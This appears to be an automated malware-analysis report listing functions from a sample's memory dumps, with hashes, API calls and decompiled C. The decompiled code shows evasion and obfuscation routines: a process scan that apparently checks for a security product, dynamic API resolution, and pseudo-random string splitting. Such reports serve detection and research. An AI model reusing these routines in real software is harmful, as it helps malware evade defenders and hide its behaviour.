                                                                                                                                  • Instruction ID: 0968982f0bf7dd37af59804bce30cbcf7c72255aa00c76726e50d22b7ea15124
                                                                                                                                  • Opcode Fuzzy Hash: 23ed0a1c342dbd2ce7f7524b36b7aafebd5da9a912bdbe91f9a1c7b4e7a75932
                                                                                                                                  • Instruction Fuzzy Hash: 44110A32229A226EEF411AF59C84D9F329D9FD36BDB350D34F534A61D8EF60C8098D50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F3F5
                                                                                                                                  • _free.LIBCMT ref: 6E92F452
                                                                                                                                  • _free.LIBCMT ref: 6E92F488
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F493
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: ae6c094546197cf17c398df98f9100d8ac1757b2f71d64555e1dc85395fbc064
                                                                                                                                  • Instruction ID: e73197dc68c5435c7b8b7e2190227aaa0a0fd879a24129ba6b53b217c5048673
                                                                                                                                  • Opcode Fuzzy Hash: ae6c094546197cf17c398df98f9100d8ac1757b2f71d64555e1dc85395fbc064
                                                                                                                                  • Instruction Fuzzy Hash: B411EC31628B116EEF611AF95C89D9B335DAFD267D7340934F534A63D8EFA0C8088920
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF95F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF96B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF980
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF998
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction ID: bd4805fce96bbe2cfd29895ea3203faea78ddc504dfd8c8a12b470b951a0bd0d
                                                                                                                                  • Opcode Fuzzy Hash: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction Fuzzy Hash: 48212AB1D0024CEFCB05CFD8C950BDDBBB9BF49318F108969E819AB694DB346A05CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF87F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF88B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF8A0
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF8B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction ID: db557a30f8cc965092d4e6c18c08b6e3dd7fccf8fc736e3744d96081085fa78a
                                                                                                                                  • Opcode Fuzzy Hash: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction Fuzzy Hash: AA214AB1D0024CEFCB05CFD8C840BDEBBB9BF49318F008969E819AB694DB306A05CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A26DD, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E031A26DD(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x31ad270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x31ad288; // 0xcbbea30d
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x31ad288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                  0x031a26e5
                                                                                                                                  0x031a26e8
                                                                                                                                  0x031a26ee
                                                                                                                                  0x031a2706
                                                                                                                                  0x031a2708
                                                                                                                                  0x031a270d
                                                                                                                                  0x031a270f
                                                                                                                                  0x031a2712
                                                                                                                                  0x031a2714
                                                                                                                                  0x031a2717
                                                                                                                                  0x031a2719
                                                                                                                                  0x031a2719
                                                                                                                                  0x031a271b
                                                                                                                                  0x031a2726
                                                                                                                                  0x031a272b
                                                                                                                                  0x031a273c
                                                                                                                                  0x031a2744
                                                                                                                                  0x031a2749
                                                                                                                                  0x031a274c
                                                                                                                                  0x031a274f
                                                                                                                                  0x031a2751
                                                                                                                                  0x031a2754
                                                                                                                                  0x031a2757
                                                                                                                                  0x031a2757
                                                                                                                                  0x031a275a
                                                                                                                                  0x031a2765
                                                                                                                                  0x031a276a
                                                                                                                                  0x031a2774

                                                                                                                                  APIs
                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,031A1A07,00000000,?,?,031A4653,?,05BD95B0), ref: 031A26E8
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 031A2700
                                                                                                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,031A1A07,00000000,?,?,031A4653,?,05BD95B0), ref: 031A2744
                                                                                                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 031A2765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1819133394-0
                                                                                                                                  • Opcode ID: 5848b8acba8824de19c1af21e4caee48a73bf708eae637a4a1de2bcf97d19f27
                                                                                                                                  • Instruction ID: ed463c5e9ea7babe1abbeff02a52b8c94b4ed8677d79c3fcc4db69a9ddd22306
                                                                                                                                  • Opcode Fuzzy Hash: 5848b8acba8824de19c1af21e4caee48a73bf708eae637a4a1de2bcf97d19f27
                                                                                                                                  • Instruction Fuzzy Hash: 36115C76A00A14BFC314CAA9DC84D9EBBFEDBD8362B190276F404C7150E7708E40D7A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A5AB2, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E031A5AB2(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E031A1A9C(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x31ad2e0; // 0x2a2a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x31ae4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x31ae8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E031A34C7();
					_push( &_v64);
					if( *0x31ad0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E031A34C7();
				}
				return _t28;
			}














                                                                                                                                  0x031a5ab2
                                                                                                                                  0x031a5ab9
                                                                                                                                  0x031a5ac7
                                                                                                                                  0x031a5acb
                                                                                                                                  0x031a5ad5
                                                                                                                                  0x031a5ada
                                                                                                                                  0x031a5adf
                                                                                                                                  0x031a5ae4
                                                                                                                                  0x031a5aee
                                                                                                                                  0x031a5af8
                                                                                                                                  0x031a5af8
                                                                                                                                  0x031a5af0
                                                                                                                                  0x031a5af0
                                                                                                                                  0x031a5af0
                                                                                                                                  0x031a5af0
                                                                                                                                  0x031a5afe
                                                                                                                                  0x031a5b04
                                                                                                                                  0x031a5b05
                                                                                                                                  0x031a5b08
                                                                                                                                  0x031a5b0b
                                                                                                                                  0x031a5b0e
                                                                                                                                  0x031a5b16
                                                                                                                                  0x031a5b1f
                                                                                                                                  0x031a5b27
                                                                                                                                  0x031a5b27
                                                                                                                                  0x031a5b29
                                                                                                                                  0x031a5b2b
                                                                                                                                  0x031a5b2b
                                                                                                                                  0x031a5b35

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1A9C: SysAllocString.OLEAUT32(00000000), ref: 031A1AF6
                                                                                                                                    • Part of subcall function 031A1A9C: SysAllocString.OLEAUT32(0070006F), ref: 031A1B0A
                                                                                                                                    • Part of subcall function 031A1A9C: SysAllocString.OLEAUT32(00000000), ref: 031A1B1C
                                                                                                                                  • memset.NTDLL ref: 031A5AD5
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A5B21
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocString$ErrorLastmemset
                                                                                                                                  • String ID: <$@MtNt
                                                                                                                                  • API String ID: 3736384471-2823972799
                                                                                                                                  • Opcode ID: a72a1ae63e88f0fb66d393c62fa0fba442fcb6b4e8c429bf1500a506a422cb87
                                                                                                                                  • Instruction ID: 093ad6e89415f54503688535b2e4b2924963560e7b5ade67aa4e29ec71112a73
                                                                                                                                  • Opcode Fuzzy Hash: a72a1ae63e88f0fb66d393c62fa0fba442fcb6b4e8c429bf1500a506a422cb87
                                                                                                                                  • Instruction Fuzzy Hash: E8012D79A00A18AFCB11EFA8D884EDEBBF9AF0C742F044526F904EB140D770D9458BA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1E36
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1E43
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E8F1E80
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FCD
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FF1
                                                                                                                                  • std::exception::exception.LIBCMTD ref: 6E8F1EA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2425033533-0
                                                                                                                                  • Opcode ID: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction ID: 84bc7622b8dd86b95011762930e5fef9f71cad178bb29a326bb75f629c6d9a3e
                                                                                                                                  • Opcode Fuzzy Hash: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction Fuzzy Hash: BD015BB1405B44DFC7208FAA848058AFAE4BF29254B908D6FE58987A01D730D545CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4A03, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			E031A4A03() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x31ad2e0; // 0x2a2a5a8
						_t2 = _t9 + 0x31aee3c; // 0x73617661
						_push( &_v264);
						if( *0x31ad110() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                                                                                                  0x031a4a0e
                                                                                                                                  0x031a4a18
                                                                                                                                  0x031a4a1c
                                                                                                                                  0x031a4a26
                                                                                                                                  0x031a4a57
                                                                                                                                  0x031a4a2d
                                                                                                                                  0x031a4a32
                                                                                                                                  0x031a4a3f
                                                                                                                                  0x031a4a48
                                                                                                                                  0x031a4a5f
                                                                                                                                  0x031a4a4a
                                                                                                                                  0x031a4a52
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4a52
                                                                                                                                  0x031a4a60
                                                                                                                                  0x031a4a61
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4a61
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4a5b
                                                                                                                                  0x031a4a67
                                                                                                                                  0x031a4a6c

                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 031A4A13
                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 031A4A26
                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 031A4A52
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 031A4A61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                  • Opcode ID: 3bd905367c2abe01430746636ee7cb14f2254d0d71717e304e68351387273c62
                                                                                                                                  • Instruction ID: cfa1692ae8931e696adca45d837bea81587b0d52d1a7585e73b75161d569a710
                                                                                                                                  • Opcode Fuzzy Hash: 3bd905367c2abe01430746636ee7cb14f2254d0d71717e304e68351387273c62
                                                                                                                                  • Instruction Fuzzy Hash: F7F0F63D100E246BC720F63B9D0ADDB76ACEBCD313F041062E516C3100EF60CA8686B5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A4450, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4450() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x31ad2a4; // 0x2e0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x31ad2f4; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x31ad2a4; // 0x2e0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x31ad270; // 0x57e0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                  0x031a4450
                                                                                                                                  0x031a4457
                                                                                                                                  0x031a44a1
                                                                                                                                  0x031a44a3
                                                                                                                                  0x031a44a3
                                                                                                                                  0x031a445b
                                                                                                                                  0x031a4461
                                                                                                                                  0x031a4466
                                                                                                                                  0x031a446a
                                                                                                                                  0x031a4470
                                                                                                                                  0x031a4477
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4479
                                                                                                                                  0x031a447e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x031a447e
                                                                                                                                  0x031a4480
                                                                                                                                  0x031a4488
                                                                                                                                  0x031a448b
                                                                                                                                  0x031a448b
                                                                                                                                  0x031a4491
                                                                                                                                  0x031a4498
                                                                                                                                  0x031a449b
                                                                                                                                  0x031a449b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(000002E0,00000001,031A191C), ref: 031A445B
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 031A446A
                                                                                                                                  • CloseHandle.KERNEL32(000002E0), ref: 031A448B
                                                                                                                                  • HeapDestroy.KERNEL32(057E0000), ref: 031A449B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4109453060-0
                                                                                                                                  • Opcode ID: bf8dd51cdfe5289c5604db35647abf94023078104e6a59e87722559b368f2856
                                                                                                                                  • Instruction ID: 0e79659d4f011e383f38994c7197f01938b058a7c865701e0f67408989f4b92f
                                                                                                                                  • Opcode Fuzzy Hash: bf8dd51cdfe5289c5604db35647abf94023078104e6a59e87722559b368f2856
                                                                                                                                  • Instruction Fuzzy Hash: 42F03779700F129BDF24BB39EA48A4376DCAB0C763B090110B805D7688DF60C484D6B0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 269201875-2547889144
                                                                                                                                  • Opcode ID: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction ID: 39835b0edfa9c604f16208a467f4e7223842532e9d05214564326cd04fe60ae8
                                                                                                                                  • Opcode Fuzzy Hash: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction Fuzzy Hash: 57C1C2319042369ADB649FE4CC50BEA73BDFF65718F3045AAD80697284EB31DA81CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E927A9D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 6E927B2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                  • Opcode ID: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction ID: bf31e69305876a649dd19c868a5efa82f2a87730dfe5c88523ab3639ef6db876
                                                                                                                                  • Opcode Fuzzy Hash: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction Fuzzy Hash: AF517961A2C102DEDF81B6E4C9503AB7BACDF41750F304D79F8A1922DCEB32C4919E86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A27C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E031A27C7(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0x31ad2d8;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0x31ad28c; // 0x2e4
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0x31ad2e0; // 0x2a2a5a8
				_t3 = _t12 + 0x31ae0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0x31ad2e0; // 0x2a2a5a8
				_t4 = _t17 + 0x31ae9ea; // 0x6f577349
				 *0x31ad2ac = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0x31ad2d8 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}










                                                                                                                                  0x031a27cb
                                                                                                                                  0x031a27d0
                                                                                                                                  0x031a27d5
                                                                                                                                  0x031a27dd
                                                                                                                                  0x031a2813
                                                                                                                                  0x031a2815
                                                                                                                                  0x031a281c
                                                                                                                                  0x031a2820
                                                                                                                                  0x031a2822
                                                                                                                                  0x031a2822
                                                                                                                                  0x031a2820
                                                                                                                                  0x031a2825
                                                                                                                                  0x031a282a
                                                                                                                                  0x031a282a
                                                                                                                                  0x031a27df
                                                                                                                                  0x031a27e4
                                                                                                                                  0x031a27eb
                                                                                                                                  0x031a27f1
                                                                                                                                  0x031a27f7
                                                                                                                                  0x031a27ff
                                                                                                                                  0x031a2804
                                                                                                                                  0x031a280a
                                                                                                                                  0x031a2811
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,031A26C2,?,00000001,?,?,?,031A1900,?), ref: 031A27EB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,6F577349), ref: 031A2804
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: Nt
                                                                                                                                  • API String ID: 1646373207-3999644925
                                                                                                                                  • Opcode ID: ea445524b502176ce299f7ef3fa508168dd2e7ad1b88656ec30dc977644291f9
                                                                                                                                  • Instruction ID: 36e81b40d3038431c3c5c6d41b14e5088fd7b587782fc3638deae8c9f36f6dcc
                                                                                                                                  • Opcode Fuzzy Hash: ea445524b502176ce299f7ef3fa508168dd2e7ad1b88656ec30dc977644291f9
                                                                                                                                  • Instruction Fuzzy Hash: 70F08C75901E0ADFDB09EBA8E914A9A73ECEB0C307B140146E401D3108EB70EA42DBB4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 031A2291, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A2291(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E031A75F6(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E031A4AAB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}





                                                                                                                                  0x031a229a
                                                                                                                                  0x031a22a4
                                                                                                                                  0x031a22a8
                                                                                                                                  0x031a22b0
                                                                                                                                  0x031a22b4
                                                                                                                                  0x031a22c3
                                                                                                                                  0x031a22c8
                                                                                                                                  0x031a22c8
                                                                                                                                  0x031a22b4
                                                                                                                                  0x031a22cf

                                                                                                                                  APIs
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,031A1083,73797325), ref: 031A22A2
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 031A22BC
